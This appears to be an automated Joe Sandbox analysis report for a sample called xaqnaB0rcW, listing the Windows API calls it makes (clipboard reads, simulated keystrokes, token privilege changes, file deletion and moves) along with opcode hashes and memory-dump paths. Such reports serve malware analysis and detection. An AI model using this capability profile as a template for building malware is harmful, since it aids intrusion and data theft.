                                                                  • Instruction ID: 3325365a7418219a967f4463cbb646806236de03bcfdbe4e202014024019e08c
                                                                  • Opcode Fuzzy Hash: 3b51cfae4fab4ed4393d5791ca347b09543f64730a5eb46e5dc38dbfec6fb51a
                                                                  • Instruction Fuzzy Hash: 79F01C71505721DFCB3A9F64D490C16B7F4AF0432A7258E2EF5D686920C7319888DF50
                                                                  APIs
                                                                  • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003540C6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: LongNamePath
                                                                  • String ID:
                                                                  • API String ID: 82841172-0
                                                                  • Opcode ID: 4594daa009145766b9d34d1b4ed3f6e0f496af0a5e5402dc4ad9852eddf2f1a9
                                                                  • Instruction ID: 5d1a92c7fa0bbc40f5da9aa711794e6159847a63ae2250d3796ad4dae6ba892c
                                                                  • Opcode Fuzzy Hash: 4594daa009145766b9d34d1b4ed3f6e0f496af0a5e5402dc4ad9852eddf2f1a9
                                                                  • Instruction Fuzzy Hash: 7BE07D335001241BC7129364CC42FEA339CDF88790F050071F908DB204D96499808690
                                                                  APIs
                                                                  • Sleep.KERNELBASE(000001F4), ref: 00FD8DE9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1350999171.0000000000FD6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FD6000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_fd6000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID:
                                                                  • API String ID: 3472027048-0
                                                                  • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                  • Instruction ID: c7a7c4ec59a2c06ca6406abdca311c5c884c5bad75d950d715c822fa16f91b01
                                                                  • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                  • Instruction Fuzzy Hash: 93E0BF7494010DEFDB00DFE4D6496DE7BB4EF04311F1006A1FD05D7680DB309E549A62
                                                                  APIs
                                                                  • Sleep.KERNELBASE(000001F4), ref: 00FD8DE9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1350999171.0000000000FD6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FD6000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_fd6000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID:
                                                                  • API String ID: 3472027048-0
                                                                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                  • Instruction ID: d0842c15d55caef5809dceb04d3481a018bd077bafb3b28acb4463bc8e6047ec
                                                                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                  • Instruction Fuzzy Hash: E7E0E67494010DDFDB00DFF4D64969E7BB4EF04301F100661FD01D2280DA309E509A62
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 003BB1CD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: %d/%02d/%02d
                                                                  • API String ID: 3850602802-328681919
                                                                  • Opcode ID: b071e7310437630eb708fc3cd6c865e4d790396ddd250868a652b0547734bca2
                                                                  • Instruction ID: 4dbe79f117dc80ca6b775e31a216fdf95b4fd065366e55b090c7e809c4f5919c
                                                                  • Opcode Fuzzy Hash: b071e7310437630eb708fc3cd6c865e4d790396ddd250868a652b0547734bca2
                                                                  • Instruction Fuzzy Hash: CD12D271500608ABEB269F68DC49FEEBBB8FF45714F10411AFA15DBAD1DBB08901CB51
                                                                  APIs
                                                                  • GetForegroundWindow.USER32(00000000,00000000), ref: 0036EB4A
                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003C3AEA
                                                                  • IsIconic.USER32(000000FF), ref: 003C3AF3
                                                                  • ShowWindow.USER32(000000FF,00000009), ref: 003C3B00
                                                                  • SetForegroundWindow.USER32(000000FF), ref: 003C3B0A
                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003C3B20
                                                                  • GetCurrentThreadId.KERNEL32 ref: 003C3B27
                                                                  • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 003C3B33
                                                                  • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 003C3B44
                                                                  • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 003C3B4C
                                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 003C3B54
                                                                  • SetForegroundWindow.USER32(000000FF), ref: 003C3B57
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 003C3B6C
                                                                  • keybd_event.USER32(00000012,00000000), ref: 003C3B77
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 003C3B81
                                                                  • keybd_event.USER32(00000012,00000000), ref: 003C3B86
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 003C3B8F
                                                                  • keybd_event.USER32(00000012,00000000), ref: 003C3B94
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 003C3B9E
                                                                  • keybd_event.USER32(00000012,00000000), ref: 003C3BA3
                                                                  • SetForegroundWindow.USER32(000000FF), ref: 003C3BA6
                                                                  • AttachThreadInput.USER32(000000FF,?,00000000), ref: 003C3BCD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                  • String ID: Shell_TrayWnd
                                                                  • API String ID: 4125248594-2988720461
                                                                  • Opcode ID: 20b8296922e2771c28d325ca4f60ec5466265557ba12e7c0332e251f99bc74a3
                                                                  • Instruction ID: f91d3b8eb20ce9c4101f6c60f2299f014761e3655492d62992d82e2301ab6819
                                                                  • Opcode Fuzzy Hash: 20b8296922e2771c28d325ca4f60ec5466265557ba12e7c0332e251f99bc74a3
                                                                  • Instruction Fuzzy Hash: A631A971A403187BEB225F75AC49F7F7F6CEB44B50F118016FA05EA1D0D6B09D109BA0
                                                                  APIs
                                                                    • Part of subcall function 0038B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0038B180
                                                                    • Part of subcall function 0038B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0038B1AD
                                                                    • Part of subcall function 0038B134: GetLastError.KERNEL32 ref: 0038B1BA
                                                                  • _memset.LIBCMT ref: 0038AD08
                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0038AD5A
                                                                  • CloseHandle.KERNEL32(?), ref: 0038AD6B
                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0038AD82
                                                                  • GetProcessWindowStation.USER32 ref: 0038AD9B
                                                                  • SetProcessWindowStation.USER32(00000000), ref: 0038ADA5
                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0038ADBF
                                                                    • Part of subcall function 0038AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0038ACC0), ref: 0038AB99
                                                                    • Part of subcall function 0038AB84: CloseHandle.KERNEL32(?,?,0038ACC0), ref: 0038ABAB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                  • String ID: $H*@$default$winsta0
                                                                  • API String ID: 2063423040-243554728
                                                                  • Opcode ID: 9ec706858af15ce9fd7c15adc4c172cd50366b00da3c4171911f6cb6c28bc7c3
                                                                  • Instruction ID: 0615d54eccbd434c07a08d5884bbb95f68d18fbe40f66c9d85b1a2353ee23c2e
                                                                  • Opcode Fuzzy Hash: 9ec706858af15ce9fd7c15adc4c172cd50366b00da3c4171911f6cb6c28bc7c3
                                                                  • Instruction Fuzzy Hash: 5881ADB180130DAFEF12AFA4DC48AEEBB78EF08344F04419AF914A61A0D7319E54DB61
                                                                  APIs
                                                                    • Part of subcall function 00396EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00395FA6,?), ref: 00396ED8
                                                                    • Part of subcall function 00396EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00395FA6,?), ref: 00396EF1
                                                                    • Part of subcall function 0039725E: __wsplitpath.LIBCMT ref: 0039727B
                                                                    • Part of subcall function 0039725E: __wsplitpath.LIBCMT ref: 0039728E
                                                                    • Part of subcall function 003972CB: GetFileAttributesW.KERNEL32(?,00396019), ref: 003972CC
                                                                  • _wcscat.LIBCMT ref: 00396149
                                                                  • _wcscat.LIBCMT ref: 00396167
                                                                  • __wsplitpath.LIBCMT ref: 0039618E
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 003961A4
                                                                  • _wcscpy.LIBCMT ref: 00396209
                                                                  • _wcscat.LIBCMT ref: 0039621C
                                                                  • _wcscat.LIBCMT ref: 0039622F
                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 0039625D
                                                                  • DeleteFileW.KERNEL32(?), ref: 0039626E
                                                                  • MoveFileW.KERNEL32(?,?), ref: 00396289
                                                                  • MoveFileW.KERNEL32(?,?), ref: 00396298
                                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 003962AD
                                                                  • DeleteFileW.KERNEL32(?), ref: 003962BE
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 003962E1
                                                                  • FindClose.KERNEL32(00000000), ref: 003962FD
                                                                  • FindClose.KERNEL32(00000000), ref: 0039630B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                  • String ID: \*.*
                                                                  • API String ID: 1917200108-1173974218
                                                                  • Opcode ID: 818bc977d7e80914eb3f9084a9af49c9f8a223790e9e3cb0138406739cd3767b
                                                                  • Instruction ID: f4ac923d208b445c21f7bec008980ad77507e63b72f259dc8df5b622758a91ea
                                                                  • Opcode Fuzzy Hash: 818bc977d7e80914eb3f9084a9af49c9f8a223790e9e3cb0138406739cd3767b
                                                                  • Instruction Fuzzy Hash: 4151617280911CAACF22EBA1DC45DEF77BCAF05300F0944E6E589E7141DE3697498FA4
                                                                  APIs
                                                                  • OpenClipboard.USER32(003EDC00), ref: 003A6B36
                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 003A6B44
                                                                  • GetClipboardData.USER32(0000000D), ref: 003A6B4C
                                                                  • CloseClipboard.USER32 ref: 003A6B58
                                                                  • GlobalLock.KERNEL32(00000000), ref: 003A6B74
                                                                  • CloseClipboard.USER32 ref: 003A6B7E
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 003A6B93
                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 003A6BA0
                                                                  • GetClipboardData.USER32(00000001), ref: 003A6BA8
                                                                  • GlobalLock.KERNEL32(00000000), ref: 003A6BB5
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 003A6BE9
                                                                  • CloseClipboard.USER32 ref: 003A6CF6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                  • String ID:
                                                                  • API String ID: 3222323430-0
                                                                  • Opcode ID: abfc162f031ce420653f2fbe79eefe77f43ffb20c9dd6282d90359f1da6e9046
                                                                  • Instruction ID: 1e19f3bac58b298a09869a9cdb9ab2dfe1332bd9ee910d89de763dbf909f8e05
                                                                  • Opcode Fuzzy Hash: abfc162f031ce420653f2fbe79eefe77f43ffb20c9dd6282d90359f1da6e9046
                                                                  • Instruction Fuzzy Hash: 3851AE31201301ABD303AF65ED56F6E77ACEB85B11F05042AF946DA1E1DF70D909CBA2
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0039F62B
                                                                  • FindClose.KERNEL32(00000000), ref: 0039F67F
                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0039F6A4
                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0039F6BB
                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0039F6E2
                                                                  • __swprintf.LIBCMT ref: 0039F72E
                                                                  • __swprintf.LIBCMT ref: 0039F767
                                                                  • __swprintf.LIBCMT ref: 0039F7BB
                                                                    • Part of subcall function 0037172B: __woutput_l.LIBCMT ref: 00371784
                                                                  • __swprintf.LIBCMT ref: 0039F809
                                                                  • __swprintf.LIBCMT ref: 0039F858
                                                                  • __swprintf.LIBCMT ref: 0039F8A7
                                                                  • __swprintf.LIBCMT ref: 0039F8F6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                  • API String ID: 835046349-2428617273
                                                                  • Opcode ID: 1e8d91cfb632c33f74dd4fd470649092dfd94473aac8926c6759c837e44f3106
                                                                  • Instruction ID: fe75458312bd6a634bc7754b334812133155cd0ed92255c231cb378635c78b24
                                                                  • Opcode Fuzzy Hash: 1e8d91cfb632c33f74dd4fd470649092dfd94473aac8926c6759c837e44f3106
                                                                  • Instruction Fuzzy Hash: 42A10FB2418344AFC716EBA4C885DAFB7ECAF98705F404C2EB585C6191EB34D949C762
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 003A1B50
                                                                  • _wcscmp.LIBCMT ref: 003A1B65
                                                                  • _wcscmp.LIBCMT ref: 003A1B7C
                                                                  • GetFileAttributesW.KERNEL32(?), ref: 003A1B8E
                                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 003A1BA8
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 003A1BC0
                                                                  • FindClose.KERNEL32(00000000), ref: 003A1BCB
                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 003A1BE7
                                                                  • _wcscmp.LIBCMT ref: 003A1C0E
                                                                  • _wcscmp.LIBCMT ref: 003A1C25
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 003A1C37
                                                                  • SetCurrentDirectoryW.KERNEL32(004039FC), ref: 003A1C55
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 003A1C5F
                                                                  • FindClose.KERNEL32(00000000), ref: 003A1C6C
                                                                  • FindClose.KERNEL32(00000000), ref: 003A1C7C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                  • String ID: *.*
                                                                  • API String ID: 1803514871-438819550
                                                                  • Opcode ID: 6a570037120bf75c2372a552789c8eae08060b448b1521cc7b156ed00dd27795
                                                                  • Instruction ID: 316ec6bcec7ba9873365104a7884eb9eadb2c8c975e1eebf5ffd18e02fe9e97a
                                                                  • Opcode Fuzzy Hash: 6a570037120bf75c2372a552789c8eae08060b448b1521cc7b156ed00dd27795
                                                                  • Instruction Fuzzy Hash: 9D31F3725412296FCF26AFB4EC49AEE77ACDF06330F1041A6F815E7090EB74DA458A64
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 003A1CAB
                                                                  • _wcscmp.LIBCMT ref: 003A1CC0
                                                                  • _wcscmp.LIBCMT ref: 003A1CD7
                                                                    • Part of subcall function 00396BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00396BEF
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 003A1D06
                                                                  • FindClose.KERNEL32(00000000), ref: 003A1D11
                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 003A1D2D
                                                                  • _wcscmp.LIBCMT ref: 003A1D54
                                                                  • _wcscmp.LIBCMT ref: 003A1D6B
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 003A1D7D
                                                                  • SetCurrentDirectoryW.KERNEL32(004039FC), ref: 003A1D9B
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 003A1DA5
                                                                  • FindClose.KERNEL32(00000000), ref: 003A1DB2
                                                                  • FindClose.KERNEL32(00000000), ref: 003A1DC2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                  • String ID: *.*
                                                                  • API String ID: 1824444939-438819550
                                                                  • Opcode ID: bfc4c9d705f08a0c9bc0d3688f973c57b279b2f0ad7ede56cea5d0ca38078698
                                                                  • Instruction ID: c5cc8b09d99ae2f756d4ab3e9840b195228e043e87549703df2e8311c83e93f5
                                                                  • Opcode Fuzzy Hash: bfc4c9d705f08a0c9bc0d3688f973c57b279b2f0ad7ede56cea5d0ca38078698
                                                                  • Instruction Fuzzy Hash: F431023250161A6FCF22AFB4EC09AEE3BACDF06324F114562F801A70D1DB74DE458B64
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: _memset
                                                                  • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                  • API String ID: 2102423945-2023335898
                                                                  • Opcode ID: 815db761b923d6f95491a6c10ef28e740bb3aa65befb7b2fd1e5f7785568e271
                                                                  • Instruction ID: 0123f5a7cf9605bee58d24036a0707a2511292e4cb01981e13c13989c1b51d12
                                                                  • Opcode Fuzzy Hash: 815db761b923d6f95491a6c10ef28e740bb3aa65befb7b2fd1e5f7785568e271
                                                                  • Instruction Fuzzy Hash: A382B171D04219CFCB26CF94C881BADB7B2FF49310F25816AD859AB361E7749D85CB90
                                                                  APIs
                                                                  • GetLocalTime.KERNEL32(?), ref: 003A09DF
                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 003A09EF
                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003A09FB
                                                                  • __wsplitpath.LIBCMT ref: 003A0A59
                                                                  • _wcscat.LIBCMT ref: 003A0A71
                                                                  • _wcscat.LIBCMT ref: 003A0A83
                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003A0A98
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 003A0AAC
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 003A0ADE
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 003A0AFF
                                                                  • _wcscpy.LIBCMT ref: 003A0B0B
                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 003A0B4A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                  • String ID: *.*
                                                                  • API String ID: 3566783562-438819550
                                                                  • Opcode ID: 5cddfb0c2c767cf630f764941bbee745a24f7817db20827084a4e030bc900c03
                                                                  • Instruction ID: b78797ed92432fca1cfbd3415c3b9d822a5169f4dc316672a71a1fe4f541edb4
                                                                  • Opcode Fuzzy Hash: 5cddfb0c2c767cf630f764941bbee745a24f7817db20827084a4e030bc900c03
                                                                  • Instruction Fuzzy Hash: 1B6147725043059FD716EF60C8859AEB3E8FF89310F04891EF9899B261DB35E949CB92
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ?$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$ICTRLCREATETREEVIEW$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$??? ?
                                                                  • API String ID: 0-1480269787
                                                                  • Opcode ID: 4bf1d49737fbdc4fdf2e214178bf31536d7dc4253648cd6dc9335daca42d7de0
                                                                  • Instruction ID: c6e96e47cd84fa70a7b6353a74b438039769ddb8dca26ff56c453270447350b2
                                                                  • Opcode Fuzzy Hash: 4bf1d49737fbdc4fdf2e214178bf31536d7dc4253648cd6dc9335daca42d7de0
